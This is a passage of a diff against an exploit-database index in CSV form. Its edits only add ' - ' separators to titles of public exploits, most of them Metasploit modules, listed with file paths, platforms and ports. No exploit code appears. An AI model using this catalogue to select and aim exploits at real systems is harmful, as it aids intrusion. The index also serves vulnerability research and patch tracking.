WebAdmin - USER Buffer Overflow",2010-02-15,Metasploit,windows,remote,0 16777,platforms/windows/remote/16777.rb,"Free Download Manager Remote Control Server Buffer Overflow",2010-07-13,Metasploit,windows,remote,80 16778,platforms/windows/remote/16778.rb,"Race River Integard Home/Pro LoginAdmin Password Stack Buffer Overflow",2010-12-15,Metasploit,windows,remote,18881 16779,platforms/windows/remote/16779.rb,"Now SMS/Mms Gateway Buffer Overflow",2010-05-09,Metasploit,windows,remote,8800 -16780,platforms/cgi/webapps/16780.rb,"HP OpenView Network Node Manager Snmp.exe CGI Buffer Overflow",2010-11-11,Metasploit,cgi,webapps,0 +16780,platforms/cgi/webapps/16780.rb,"HP OpenView Network Node Manager - Snmp.exe CGI Buffer Overflow",2010-11-11,Metasploit,cgi,webapps,0 16781,platforms/windows/remote/16781.rb,"MailEnable Authorization Header Buffer Overflow",2010-07-07,Metasploit,windows,remote,0 -16782,platforms/windows/remote/16782.rb,"Apache Win32 Chunked Encoding",2010-07-07,Metasploit,windows,remote,0 +16782,platforms/windows/remote/16782.rb,"Apache - (Win32) Chunked Encoding",2010-07-07,Metasploit,windows,remote,0 16783,platforms/win_x86/remote/16783.rb,"McAfee ePolicy Orchestrator / ProtectionPilot Overflow",2010-09-20,Metasploit,win_x86,remote,0 16784,platforms/multiple/remote/16784.rb,"Novell ZENworks Configuration Management 10.2.0 - Remote Execution (1)",2010-11-22,Metasploit,multiple,remote,80 16785,platforms/windows/remote/16785.rb,"Hewlett-Packard Power Manager Administration Buffer Overflow",2010-11-24,Metasploit,windows,remote,80 @@ -14591,31 +14591,31 @@ id,file,description,date,author,platform,type,port 16788,platforms/cfm/webapps/16788.rb,"ColdFusion 8.0.1 - Arbitrary File Upload and Execute",2010-11-24,Metasploit,cfm,webapps,0 16789,platforms/multiple/remote/16789.rb,"Adobe RoboHelp Server 8 - Arbitrary File Upload and Execute",2010-11-24,Metasploit,multiple,remote,8080 16790,platforms/windows/dos/16790.rb,"PSO Proxy 0.91 - Stack Buffer Overflow",2010-05-09,Metasploit,windows,dos,8080 -16791,platforms/windows/remote/16791.rb,"MaxDB WebDBM GET Buffer Overflow",2010-05-09,Metasploit,windows,remote,9999 -16792,platforms/windows/remote/16792.rb,"HP OpenView Network Node Manager OvWebHelp.exe CGI Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 -16793,platforms/windows/remote/16793.rb,"Amlibweb NetOpacs webquery.dll Stack Buffer Overflow",2010-11-14,Metasploit,windows,remote,80 +16791,platforms/windows/remote/16791.rb,"MaxDB WebDBM - GET Buffer Overflow",2010-05-09,Metasploit,windows,remote,9999 +16792,platforms/windows/remote/16792.rb,"HP OpenView Network Node Manager - OvWebHelp.exe CGI Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 +16793,platforms/windows/remote/16793.rb,"Amlibweb NetOpacs - webquery.dll Stack Buffer Overflow",2010-11-14,Metasploit,windows,remote,80 16794,platforms/windows/remote/16794.rb,"HTTPDX - tolog() Function Format String (2)",2010-08-25,Metasploit,windows,remote,80 16795,platforms/cgi/webapps/16795.rb,"HP OpenView Network Node Manager - Toolbar.exe CGI Buffer Overflow",2010-05-09,Metasploit,cgi,webapps,0 16796,platforms/windows/remote/16796.rb,"BEA Weblogic Transfer-Encoding Buffer Overflow",2010-07-08,Metasploit,windows,remote,80 -16797,platforms/windows/remote/16797.rb,"HP OpenView Network Node Manager ovalarm.exe CGI Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 +16797,platforms/windows/remote/16797.rb,"HP OpenView Network Node Manager - ovalarm.exe CGI Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 16798,platforms/windows/remote/16798.rb,"Apache mod_jk 1.2.20 - Buffer Overflow",2010-07-25,Metasploit,windows,remote,0 16799,platforms/windows/remote/16799.rb,"HTTPDX h_handlepeer() Function Buffer Overflow",2010-07-26,Metasploit,windows,remote,0 -16800,platforms/windows/remote/16800.rb,"Streamcast 0.9.75 HTTP User-Agent Buffer Overflow",2010-06-11,Metasploit,windows,remote,8000 +16800,platforms/windows/remote/16800.rb,"Streamcast 0.9.75 - HTTP User-Agent Buffer Overflow",2010-06-11,Metasploit,windows,remote,8000 16801,platforms/windows/remote/16801.rb,"CA iTechnology iGateway Debug Mode Buffer Overflow",2010-04-30,Metasploit,windows,remote,5250 16802,platforms/windows/remote/16802.rb,"Webster HTTP Server GET Buffer Overflow",2010-11-03,Metasploit,windows,remote,0 -16803,platforms/windows/remote/16803.rb,"Alt-N SecurityGateway username Buffer Overflow",2010-07-07,Metasploit,windows,remote,4000 +16803,platforms/windows/remote/16803.rb,"Alt-N SecurityGateway - username Buffer Overflow",2010-07-07,Metasploit,windows,remote,4000 16804,platforms/windows/remote/16804.rb,"Belkin Bulldog Plus Web Service Buffer Overflow",2010-05-09,Metasploit,windows,remote,80 -16805,platforms/windows/remote/16805.rb,"HP OpenView Network Node Manager OpenView5.exe CGI Buffer Overflow",2010-05-09,Metasploit,windows,remote,80 -16806,platforms/windows/remote/16806.rb,"BadBlue 2.72b PassThru Buffer Overflow",2010-07-08,Metasploit,windows,remote,0 -16807,platforms/windows/remote/16807.rb,"InterSystems Cache UtilConfigHome.csp Argument Buffer Overflow",2010-07-12,Metasploit,windows,remote,57772 -16808,platforms/windows/remote/16808.rb,"NaviCOPA 2.0.1 URL Handling Buffer Overflow",2010-07-12,Metasploit,windows,remote,80 -16809,platforms/win_x86/remote/16809.rb,"Oracle 9i XDB HTTP PASS Overflow (Win32)",2010-09-20,Metasploit,win_x86,remote,8080 +16805,platforms/windows/remote/16805.rb,"HP OpenView Network Node Manager - OpenView5.exe CGI Buffer Overflow",2010-05-09,Metasploit,windows,remote,80 +16806,platforms/windows/remote/16806.rb,"BadBlue 2.72b - PassThru Buffer Overflow",2010-07-08,Metasploit,windows,remote,0 +16807,platforms/windows/remote/16807.rb,"InterSystems Cache - UtilConfigHome.csp Argument Buffer Overflow",2010-07-12,Metasploit,windows,remote,57772 +16808,platforms/windows/remote/16808.rb,"NaviCOPA 2.0.1 - URL Handling Buffer Overflow",2010-07-12,Metasploit,windows,remote,80 +16809,platforms/win_x86/remote/16809.rb,"Oracle 9i XDB - HTTP PASS Overflow (Win32)",2010-09-20,Metasploit,win_x86,remote,8080 16810,platforms/windows/remote/16810.rb,"IBM TPM for OS Deployment 5.1.0.x - rembo.exe Buffer Overflow",2010-09-20,Metasploit,windows,remote,443 16811,platforms/windows/webapps/16811.rb,"TrackerCam PHP Argument Buffer Overflow",2010-05-09,Metasploit,windows,webapps,8090 -16812,platforms/windows/remote/16812.rb,"MDaemon 6.8.5 WorldClient form2raw.cgi Stack Buffer Overflow",2010-07-01,Metasploit,windows,remote,3000 -16813,platforms/windows/remote/16813.rb,"Novell NetMail 3.52d NMAP STOR Buffer Overflow",2010-05-09,Metasploit,windows,remote,689 +16812,platforms/windows/remote/16812.rb,"MDaemon 6.8.5 - WorldClient form2raw.cgi Stack Buffer Overflow",2010-07-01,Metasploit,windows,remote,3000 +16813,platforms/windows/remote/16813.rb,"Novell NetMail 3.52d - NMAP STOR Buffer Overflow",2010-05-09,Metasploit,windows,remote,689 16814,platforms/windows/remote/16814.rb,"Novell GroupWise Messenger Client Buffer Overflow",2010-06-22,Metasploit,windows,remote,8300 -16815,platforms/windows/remote/16815.rb,"Novell ZENworks 6.5 Desktop/Server Management Overflow",2010-07-25,Metasploit,windows,remote,0 +16815,platforms/windows/remote/16815.rb,"Novell ZENworks 6.5 - Desktop/Server Management Overflow",2010-07-25,Metasploit,windows,remote,0 16816,platforms/windows/remote/16816.rb,"GAMSoft TelSrv 1.5 - Username Buffer Overflow",2010-06-22,Metasploit,windows,remote,23 16817,platforms/windows/remote/16817.rb,"GoodTech Telnet Server 5.0.6 - Buffer Overflow",2010-05-09,Metasploit,windows,remote,2380 16818,platforms/windows/remote/16818.rb,"YPOPS 0.6 - Buffer Overflow",2010-05-09,Metasploit,windows,remote,25 @@ -14623,28 +14623,28 @@ id,file,description,date,author,platform,type,port 16820,platforms/windows/remote/16820.rb,"Exchange 2000 - XEXCH50 Heap Overflow (MS03-046)",2010-11-11,Metasploit,windows,remote,25 16821,platforms/windows/remote/16821.rb,"Mercury Mail SMTP AUTH CRAM-MD5 - Buffer Overflow",2010-06-22,Metasploit,windows,remote,25 16822,platforms/windows/remote/16822.rb,"TABS MailCarrier 2.51 - SMTP EHLO Overflow",2010-04-30,Metasploit,windows,remote,25 -16823,platforms/windows/remote/16823.rb,"Network Associates PGP KeyServer 7 LDAP Buffer Overflow",2010-11-14,Metasploit,windows,remote,389 +16823,platforms/windows/remote/16823.rb,"Network Associates PGP KeyServer 7 - LDAP Buffer Overflow",2010-11-14,Metasploit,windows,remote,389 16824,platforms/windows/remote/16824.rb,"IMail LDAP Service Buffer Overflow",2010-04-30,Metasploit,windows,remote,389 16825,platforms/windows/remote/16825.rb,"CA CAM log_security() Stack Buffer Overflow (Win32)",2010-09-20,Metasploit,windows,remote,0 16826,platforms/windows/remote/16826.rb,"Symantec Alert Management System Intel Alert Originator Service Buffer Overflow",2010-05-13,Metasploit,windows,remote,38292 16827,platforms/windows/remote/16827.rb,"Trend Micro ServerProtect 5.58 - Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 -16828,platforms/windows/remote/16828.rb,"Trend Micro ServerProtect 5.58 CreateBinding() Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 -16829,platforms/windows/remote/16829.rb,"Trend Micro ServerProtect 5.58 EarthAgent.EXE Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 +16828,platforms/windows/remote/16828.rb,"Trend Micro ServerProtect 5.58 - CreateBinding() Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 +16829,platforms/windows/remote/16829.rb,"Trend Micro ServerProtect 5.58 - EarthAgent.EXE Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 16830,platforms/windows/remote/16830.rb,"Symantec Remote Management Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16831,platforms/windows/remote/16831.rb,"SafeNet SoftRemote IKE Service Buffer Overflow",2010-06-22,Metasploit,windows,remote,62514 -16832,platforms/netware/remote/16832.rb,"Novell NetWare LSASS CIFS.NLM Driver Stack Buffer Overflow",2010-05-09,Metasploit,netware,remote,0 -16833,platforms/netware/remote/16833.rb,"NetWare 6.5 SunRPC Portmapper CALLIT Stack Buffer Overflow",2010-11-14,Metasploit,netware,remote,111 +16832,platforms/netware/remote/16832.rb,"Novell NetWare - LSASS CIFS.NLM Driver Stack Buffer Overflow",2010-05-09,Metasploit,netware,remote,0 +16833,platforms/netware/remote/16833.rb,"NetWare 6.5 - SunRPC Portmapper CALLIT Stack Buffer Overflow",2010-11-14,Metasploit,netware,remote,111 16834,platforms/linux/remote/16834.rb,"Snort Back Orifice - Pre-Preprocessor Remote Exploit",2010-07-03,Metasploit,linux,remote,0 16835,platforms/linux/remote/16835.rb,"Madwifi SIOCGIWSCAN Buffer Overflow",2010-09-20,Metasploit,linux,remote,0 -16836,platforms/linux/remote/16836.rb,"Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow",2010-04-30,Metasploit,linux,remote,0 -16837,platforms/linux/remote/16837.rb,"hplip hpssd.py From Address Arbitrary Command Execution",2010-10-09,Metasploit,linux,remote,0 +16836,platforms/linux/remote/16836.rb,"Cyrus IMAPD - pop3d popsubfolders USER Buffer Overflow",2010-04-30,Metasploit,linux,remote,0 +16837,platforms/linux/remote/16837.rb,"hplip - hpssd.py From Address Arbitrary Command Execution",2010-10-09,Metasploit,linux,remote,0 16838,platforms/linux/remote/16838.rb,"NetSupport Manager Agent - Remote Buffer Overflow (2)",2011-03-03,Metasploit,linux,remote,0 -16839,platforms/linux/remote/16839.rb,"Borland InterBase PWD_db_aliased() Buffer Overflow",2010-07-03,Metasploit,linux,remote,0 -16840,platforms/linux/remote/16840.rb,"Borland InterBase open_marker_file() Buffer Overflow",2010-07-03,Metasploit,linux,remote,0 +16839,platforms/linux/remote/16839.rb,"Borland InterBase - PWD_db_aliased() Buffer Overflow",2010-07-03,Metasploit,linux,remote,0 +16840,platforms/linux/remote/16840.rb,"Borland InterBase - open_marker_file() Buffer Overflow",2010-07-03,Metasploit,linux,remote,0 16841,platforms/linux/remote/16841.rb,"GLD (Greylisting Daemon) Postfix Buffer Overflow",2010-07-03,Metasploit,linux,remote,0 16842,platforms/linux/remote/16842.rb,"LPRng - use_syslog Remote Format String",2010-07-03,Metasploit,linux,remote,0 -16843,platforms/linux/remote/16843.rb,"Borland InterBase jrd8_create_database() Buffer Overflow",2010-07-03,Metasploit,linux,remote,0 -16844,platforms/linux/remote/16844.rb,"Borland InterBase INET_connect() Buffer Overflow",2010-07-03,Metasploit,linux,remote,0 +16843,platforms/linux/remote/16843.rb,"Borland InterBase - jrd8_create_database() Buffer Overflow",2010-07-03,Metasploit,linux,remote,0 +16844,platforms/linux/remote/16844.rb,"Borland InterBase - INET_connect() Buffer Overflow",2010-07-03,Metasploit,linux,remote,0 16845,platforms/linux/remote/16845.rb,"Poptop - Negative Read Overflow",2010-11-23,Metasploit,linux,remote,0 16846,platforms/linux/remote/16846.rb,"UoW IMAP server LSUB Buffer Overflow",2010-03-26,Metasploit,linux,remote,0 16847,platforms/linux/remote/16847.rb,"Squid NTLM Authenticate Overflow",2010-04-30,Metasploit,linux,remote,0 @@ -14654,10 +14654,10 @@ id,file,description,date,author,platform,type,port 16851,platforms/linux/remote/16851.rb,"ProFTPD 1.3.2rc3 < 1.3.3b - Telnet IAC Buffer Overflow (Linux)",2011-01-09,Metasploit,linux,remote,0 16852,platforms/linux/remote/16852.rb,"ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)",2011-01-09,Metasploit,linux,remote,0 16853,platforms/linux/remote/16853.rb,"Berlios GPSD Format String",2010-04-30,Metasploit,linux,remote,0 -16854,platforms/hardware/remote/16854.rb,"Linksys WRT54 Access Point apply.cgi Buffer Overflow",2010-09-24,Metasploit,hardware,remote,0 +16854,platforms/hardware/remote/16854.rb,"Linksys WRT54 Access Point - apply.cgi Buffer Overflow",2010-09-24,Metasploit,hardware,remote,0 16855,platforms/linux/remote/16855.rb,"PeerCast 0.1216 - URL Handling Buffer Overflow (Linux)",2010-09-20,Metasploit,linux,remote,0 -16856,platforms/cgi/webapps/16856.rb,"DD-WRT HTTP Daemon Arbitrary Command Execution",2010-07-07,Metasploit,cgi,webapps,0 -16857,platforms/cgi/webapps/16857.rb,"Alcatel-Lucent OmniPCX Enterprise masterCGI Arbitrary Command Execution",2010-10-05,Metasploit,cgi,webapps,0 +16856,platforms/cgi/webapps/16856.rb,"DD-WRT HTTP Daemon - Arbitrary Command Execution",2010-07-07,Metasploit,cgi,webapps,0 +16857,platforms/cgi/webapps/16857.rb,"Alcatel-Lucent OmniPCX Enterprise - masterCGI Arbitrary Command Execution",2010-10-05,Metasploit,cgi,webapps,0 16858,platforms/php/webapps/16858.rb,"RedHat Piranha Virtual Server Package - passwd.php3 Arbitrary Command Execution",2010-10-18,Metasploit,php,webapps,0 16859,platforms/linux/remote/16859.rb,"Samba lsa_io_trans_names Heap Overflow (Linux)",2010-07-14,Metasploit,linux,remote,0 16860,platforms/linux/remote/16860.rb,"Samba - chain_reply Memory Corruption (Linux x86)",2010-09-04,Metasploit,linux,remote,0 @@ -14666,74 +14666,74 @@ id,file,description,date,author,platform,type,port 16863,platforms/osx/remote/16863.rb,"AppleFileServer LoginExt PathName Overflow",2010-09-20,Metasploit,osx,remote,0 16864,platforms/osx/remote/16864.rb,"UFO: Alien Invasion IRC Client - Buffer Overflow Exploit (OSX)",2010-10-09,Metasploit,osx,remote,0 16865,platforms/osx/remote/16865.rb,"Arkeia Backup Client Type 77 - Overflow (Mac OS X)",2010-05-09,Metasploit,osx,remote,0 -16866,platforms/unix/remote/16866.rb,"Safari Archive Metadata Command Execution",2010-09-20,Metasploit,unix,remote,0 -16867,platforms/osx/remote/16867.rb,"Apple OS X Software Update Command Execution",2010-09-20,Metasploit,osx,remote,0 +16866,platforms/unix/remote/16866.rb,"Safari - Archive Metadata Command Execution",2010-09-20,Metasploit,unix,remote,0 +16867,platforms/osx/remote/16867.rb,"Apple OS X Software Update - Command Execution",2010-09-20,Metasploit,osx,remote,0 16868,platforms/hardware/remote/16868.rb,"iPhone MobileSafari LibTIFF - 'email' Buffer Overflow (2)",2010-09-20,Metasploit,hardware,remote,0 16869,platforms/hardware/remote/16869.rb,"iPhone MobileMail LibTIFF Buffer Overflow",2010-09-20,Metasploit,hardware,remote,0 -16870,platforms/multiple/remote/16870.rb,"Mail.app Image Attachment Command Execution",2011-03-05,Metasploit,multiple,remote,0 +16870,platforms/multiple/remote/16870.rb,"Mail.app - Image Attachment Command Execution",2011-03-05,Metasploit,multiple,remote,0 16871,platforms/osx/remote/16871.rb,"Mac OS X mDNSResponder UPnP Location Overflow",2011-01-08,Metasploit,osx,remote,0 16872,platforms/osx/remote/16872.rb,"WebSTAR FTP Server USER Overflow",2010-09-20,Metasploit,osx,remote,0 16873,platforms/osx/remote/16873.rb,"MacOS X QuickTime RTSP Content-Type Overflow",2010-10-09,Metasploit,osx,remote,0 16874,platforms/osx/remote/16874.rb,"MacOS X EvoCam HTTP GET Buffer Overflow",2010-10-09,Metasploit,osx,remote,0 16875,platforms/osx/remote/16875.rb,"Samba - lsa_io_trans_names Heap Overflow (OSX)",2010-04-05,Metasploit,osx,remote,0 16876,platforms/osx_ppc/remote/16876.rb,"Samba - trans2open Overflow (Mac OS X PPC)",2010-06-21,Metasploit,osx_ppc,remote,0 -16877,platforms/irix/remote/16877.rb,"Irix LPD tagprinter Command Execution",2010-10-06,Metasploit,irix,remote,0 +16877,platforms/irix/remote/16877.rb,"Irix LPD tagprinter - Command Execution",2010-10-06,Metasploit,irix,remote,0 16878,platforms/linux/remote/16878.rb,"ProFTPD 1.3.2rc3 < 1.3.3b - Telnet IAC Buffer Overflow (FreeBSD)",2010-12-02,Metasploit,linux,remote,0 -16879,platforms/freebsd/remote/16879.rb,"XTACACSD 4.1.2 report() Buffer Overflow",2010-05-09,Metasploit,freebsd,remote,0 +16879,platforms/freebsd/remote/16879.rb,"XTACACSD 4.1.2 - report() Buffer Overflow",2010-05-09,Metasploit,freebsd,remote,0 16880,platforms/linux/remote/16880.rb,"Samba trans2open - Overflow (*BSD x86)",2010-06-17,Metasploit,linux,remote,0 16881,platforms/php/webapps/16881.rb,"Cacti - graph_view.php Remote Command Execution",2010-07-03,Metasploit,php,webapps,0 -16882,platforms/php/webapps/16882.rb,"PHP XML-RPC Arbitrary Code Execution",2010-07-25,Metasploit,php,webapps,0 +16882,platforms/php/webapps/16882.rb,"PHP XML-RPC - Arbitrary Code Execution",2010-07-25,Metasploit,php,webapps,0 16883,platforms/php/webapps/16883.rb,"Simple PHP Blog 0.4.0 - Remote Command Execution",2010-07-25,Metasploit,php,webapps,0 -16885,platforms/php/webapps/16885.rb,"TikiWiki jhot Remote Command Execution",2010-07-25,Metasploit,php,webapps,0 +16885,platforms/php/webapps/16885.rb,"TikiWiki jhot - Remote Command Execution",2010-07-25,Metasploit,php,webapps,0 16886,platforms/cgi/webapps/16886.rb,"AWStats (6.4-6.5) migrate - Remote Command Execution",2010-07-03,Metasploit,cgi,webapps,0 -16887,platforms/linux/remote/16887.rb,"HP Openview connectedNodes.ovpl Remote Command Execution",2010-07-03,Metasploit,linux,remote,0 +16887,platforms/linux/remote/16887.rb,"HP Openview - connectedNodes.ovpl Remote Command Execution",2010-07-03,Metasploit,linux,remote,0 16888,platforms/linux/remote/16888.rb,"SquirrelMail PGP Plugin - Command Execution (SMTP)",2010-08-25,Metasploit,linux,remote,0 16889,platforms/linux/webapps/16889.rb,"Redmine SCM Repository 0.9.x / 1.0.x - Arbitrary Command Execution",2011-01-08,Metasploit,linux,webapps,0 -16890,platforms/php/webapps/16890.rb,"phpBB viewtopic.php Arbitrary Code Execution",2010-07-03,Metasploit,php,webapps,0 -16891,platforms/cgi/webapps/16891.rb,"QuickTime Streaming Server parse_xml.cgi Remote Execution",2010-07-03,Metasploit,cgi,webapps,0 +16890,platforms/php/webapps/16890.rb,"phpBB - viewtopic.php Arbitrary Code Execution",2010-07-03,Metasploit,php,webapps,0 +16891,platforms/cgi/webapps/16891.rb,"QuickTime Streaming Server - parse_xml.cgi Remote Execution",2010-07-03,Metasploit,cgi,webapps,0 16892,platforms/php/webapps/16892.rb,"TWiki History TWikiUsers - rev Parameter Command Execution",2010-07-03,Metasploit,php,webapps,0 -16893,platforms/cgi/webapps/16893.rb,"Barracuda IMG.PL Remote Command Execution",2010-04-30,Metasploit,cgi,webapps,0 -16894,platforms/php/webapps/16894.rb,"TWiki Search Function Arbitrary Command Execution",2010-07-03,Metasploit,php,webapps,0 +16893,platforms/cgi/webapps/16893.rb,"Barracuda - IMG.PL Remote Command Execution",2010-04-30,Metasploit,cgi,webapps,0 +16894,platforms/php/webapps/16894.rb,"TWiki Search Function - Arbitrary Command Execution",2010-07-03,Metasploit,php,webapps,0 16895,platforms/php/webapps/16895.rb,"WordPress cache_lastpostdate - Arbitrary Code Execution",2010-07-03,Metasploit,php,webapps,0 -16896,platforms/php/webapps/16896.rb,"vBulletin misc.php Template Name Arbitrary Code Execution",2010-07-25,Metasploit,php,webapps,0 +16896,platforms/php/webapps/16896.rb,"vBulletin - misc.php Template Name Arbitrary Code Execution",2010-07-25,Metasploit,php,webapps,0 16897,platforms/php/webapps/16897.rb,"BASE - base_qry_common Remote File Inclusion",2010-11-24,Metasploit,php,webapps,0 16899,platforms/php/webapps/16899.rb,"osCommerce 2.2 - Arbitrary PHP Code Execution",2010-07-03,Metasploit,php,webapps,0 -16901,platforms/php/webapps/16901.rb,"PAJAX Remote Command Execution",2010-04-30,Metasploit,php,webapps,0 +16901,platforms/php/webapps/16901.rb,"PAJAX - Remote Command Execution",2010-04-30,Metasploit,php,webapps,0 16902,platforms/php/webapps/16902.rb,"CakePHP 1.3.5 / 1.2.8 - Cache Corruption Exploit",2011-01-14,Metasploit,php,webapps,0 -16903,platforms/php/remote/16903.rb,"OpenX banner-edit.php File Upload PHP Code Execution",2010-09-20,Metasploit,php,remote,0 +16903,platforms/php/remote/16903.rb,"OpenX - banner-edit.php File Upload PHP Code Execution",2010-09-20,Metasploit,php,remote,0 16904,platforms/php/webapps/16904.rb,"Trixbox CE 2.6.1 - langChoice PHP Local File Inclusion",2011-01-08,Metasploit,php,webapps,0 16905,platforms/cgi/webapps/16905.rb,"AWStats (6.1-6.2) - configdir Remote Command Execution",2009-12-26,Metasploit,cgi,webapps,0 16906,platforms/php/webapps/16906.rb,"Joomla 1.5.12 - TinyBrowser File Upload Code Execution",2010-06-15,Metasploit,php,webapps,0 -16907,platforms/hardware/webapps/16907.rb,"Google Appliance ProxyStyleSheet Command Execution",2010-07-01,Metasploit,hardware,webapps,0 -16908,platforms/cgi/webapps/16908.rb,"Nagios3 statuswml.cgi Ping Command Execution",2010-07-14,Metasploit,cgi,webapps,0 -16909,platforms/php/webapps/16909.rb,"Coppermine Photo Gallery 1.4.14 picEditor.php Command Execution",2010-07-03,Metasploit,php,webapps,0 +16907,platforms/hardware/webapps/16907.rb,"Google Appliance ProxyStyleSheet - Command Execution",2010-07-01,Metasploit,hardware,webapps,0 +16908,platforms/cgi/webapps/16908.rb,"Nagios3 - statuswml.cgi Ping Command Execution",2010-07-14,Metasploit,cgi,webapps,0 +16909,platforms/php/webapps/16909.rb,"Coppermine Photo Gallery 1.4.14 - picEditor.php Command Execution",2010-07-03,Metasploit,php,webapps,0 16910,platforms/linux/remote/16910.rb,"Mitel Audio and Web Conferencing - Command Injection",2011-01-08,Metasploit,linux,remote,0 16911,platforms/php/webapps/16911.rb,"TikiWiki tiki-graph_formula Remote PHP Code Execution",2010-09-20,Metasploit,php,webapps,0 16912,platforms/php/webapps/16912.rb,"Mambo - Cache_Lite Class mosConfig_absolute_path Remote File Inclusion",2010-11-24,Metasploit,php,webapps,0 16913,platforms/php/webapps/16913.rb,"phpMyAdmin - Config File Code Injection",2010-07-03,Metasploit,php,webapps,0 -16914,platforms/cgi/webapps/16914.rb,"Matt Wright guestbook.pl Arbitrary Command Execution",2010-07-03,Metasploit,cgi,webapps,0 +16914,platforms/cgi/webapps/16914.rb,"Matt Wright guestbook.pl - Arbitrary Command Execution",2010-07-03,Metasploit,cgi,webapps,0 16915,platforms/linux/remote/16915.rb,"Oracle VM Server Virtual Server Agent Command Injection",2010-10-25,Metasploit,linux,remote,0 16916,platforms/linux/remote/16916.rb,"Citrix Access Gateway - Command Execution",2011-03-03,Metasploit,linux,remote,0 -16917,platforms/php/webapps/16917.rb,"Dogfood CRM spell.php Remote Command Execution",2010-07-03,Metasploit,php,webapps,0 -16918,platforms/freebsd/remote/16918.rb,"Zabbix Agent net.tcp.listen Command Injection",2010-07-03,Metasploit,freebsd,remote,0 -16919,platforms/linux/remote/16919.rb,"DistCC Daemon Command Execution",2010-07-03,Metasploit,linux,remote,0 -16920,platforms/linux/remote/16920.rb,"SpamAssassin spamd Remote Command Execution",2010-04-30,Metasploit,linux,remote,0 +16917,platforms/php/webapps/16917.rb,"Dogfood CRM - spell.php Remote Command Execution",2010-07-03,Metasploit,php,webapps,0 +16918,platforms/freebsd/remote/16918.rb,"Zabbix Agent - net.tcp.listen Command Injection",2010-07-03,Metasploit,freebsd,remote,0 +16919,platforms/linux/remote/16919.rb,"DistCC Daemon - Command Execution",2010-07-03,Metasploit,linux,remote,0 +16920,platforms/linux/remote/16920.rb,"SpamAssassin spamd - Remote Command Execution",2010-04-30,Metasploit,linux,remote,0 16921,platforms/linux/remote/16921.rb,"ProFTPD-1.3.3c - Backdoor Command Execution",2010-12-03,Metasploit,linux,remote,0 16922,platforms/linux/remote/16922.rb,"UnrealIRCD 3.2.8.1 - Backdoor Command Execution",2010-12-05,Metasploit,linux,remote,0 -16923,platforms/hardware/webapps/16923.rb,"ContentKeeper Web Remote Command Execution",2010-10-09,Metasploit,hardware,webapps,0 +16923,platforms/hardware/webapps/16923.rb,"ContentKeeper Web - Remote Command Execution",2010-10-09,Metasploit,hardware,webapps,0 16924,platforms/linux/remote/16924.rb,"ClamAV Milter Blackhole-Mode Remote Code Execution",2010-10-09,Metasploit,linux,remote,0 16925,platforms/linux/remote/16925.rb,"Exim4 <= 4.69 - string_format Function Heap Buffer Overflow",2010-12-16,Metasploit,linux,remote,0 16926,platforms/windows/remote/16926.rb,"Mercantec SoftCart CGI Overflow",2010-09-20,Metasploit,windows,remote,0 -16927,platforms/hp-ux/remote/16927.rb,"HP-UX LPD Command Execution",2010-10-06,Metasploit,hp-ux,remote,0 +16927,platforms/hp-ux/remote/16927.rb,"HP-UX LPD - Command Execution",2010-10-06,Metasploit,hp-ux,remote,0 16928,platforms/linux/remote/16928.rb,"System V Derived /bin/login Extraneous Arguments Buffer Overflow",2010-07-03,Metasploit,linux,remote,0 16929,platforms/aix/dos/16929.rb,"AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 - Buffer Overflow",2010-11-11,Metasploit,aix,dos,0 -16930,platforms/aix/remote/16930.rb,"ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)",2010-11-11,Metasploit,aix,remote,0 +16930,platforms/aix/remote/16930.rb,"ToolTalk - rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)",2010-11-11,Metasploit,aix,remote,0 16931,platforms/php/webapps/16931.html,"N-13 News 4.0 - CSRF (Add Admin)",2011-03-06,"AtT4CKxT3rR0r1ST ",php,webapps,0 16946,platforms/php/webapps/16946.txt,"RuubikCMS 1.0.3 - Multiple Vulnerabilities",2011-03-08,"Khashayar Fereidani",php,webapps,0 16933,platforms/php/webapps/16933.txt,"Quick Polls - Local File Inclusion and Deletion",2011-03-06,"Mark Stanislav",php,webapps,0 16934,platforms/php/webapps/16934.pl,"EggAvatar for vBulletin 3.8.x - SQL Injection",2011-03-06,DSecurity,php,webapps,0 16935,platforms/php/webapps/16935.txt,"bacula-web 1.3.x < 5.0.3 - Multiple Vulnerabilities",2011-03-07,b0telh0,php,webapps,0 -16936,platforms/windows/remote/16936.html,"KingView 6.5.3 SCADA ActiveX Exploit",2011-03-07,"Carlos Mario Penagos Hollmann",windows,remote,0 +16936,platforms/windows/remote/16936.html,"KingView 6.5.3 SCADA - ActiveX Exploit",2011-03-07,"Carlos Mario Penagos Hollmann",windows,remote,0 16937,platforms/php/webapps/16937.pl,"EggAvatar 2.3.2 for vBulletin 3.8.x - Local File Read",2011-03-07,DSecurity,php,webapps,0 16938,platforms/php/webapps/16938.txt,"BMForum Myna 6.0 - SQL Injection",2011-03-07,"Stephan Sattler",php,webapps,0 16939,platforms/multiple/dos/16939.txt,"Hiawatha WebServer 7.4 - Denial of Service",2011-03-07,"Rodrigo Escobar",multiple,dos,0 @@ -14754,7 +14754,7 @@ id,file,description,date,author,platform,type,port 16955,platforms/asp/webapps/16955.txt,"SmarterMail 7.3 / 7.4 - Multiple Vulnerabilities",2011-03-10,"Hoyt LLC Research",asp,webapps,0 16956,platforms/windows/remote/16956.rb,"Novell iPrint Client ActiveX Control 5.52 - Buffer Overflow",2011-03-07,Metasploit,windows,remote,0 16957,platforms/windows/remote/16957.rb,"Oracle MySQL for Microsoft Windows Payload Execution",2011-03-08,Metasploit,windows,remote,0 -16959,platforms/multiple/webapps/16959.txt,"Oracle WebLogic Session Fixation Via HTTP POST",2011-03-11,"Roberto Suggi Liverani",multiple,webapps,0 +16959,platforms/multiple/webapps/16959.txt,"Oracle WebLogic - Session Fixation Via HTTP POST",2011-03-11,"Roberto Suggi Liverani",multiple,webapps,0 16960,platforms/linux/dos/16960.txt,"Linux NTP query client 4.2.6p1 - Heap 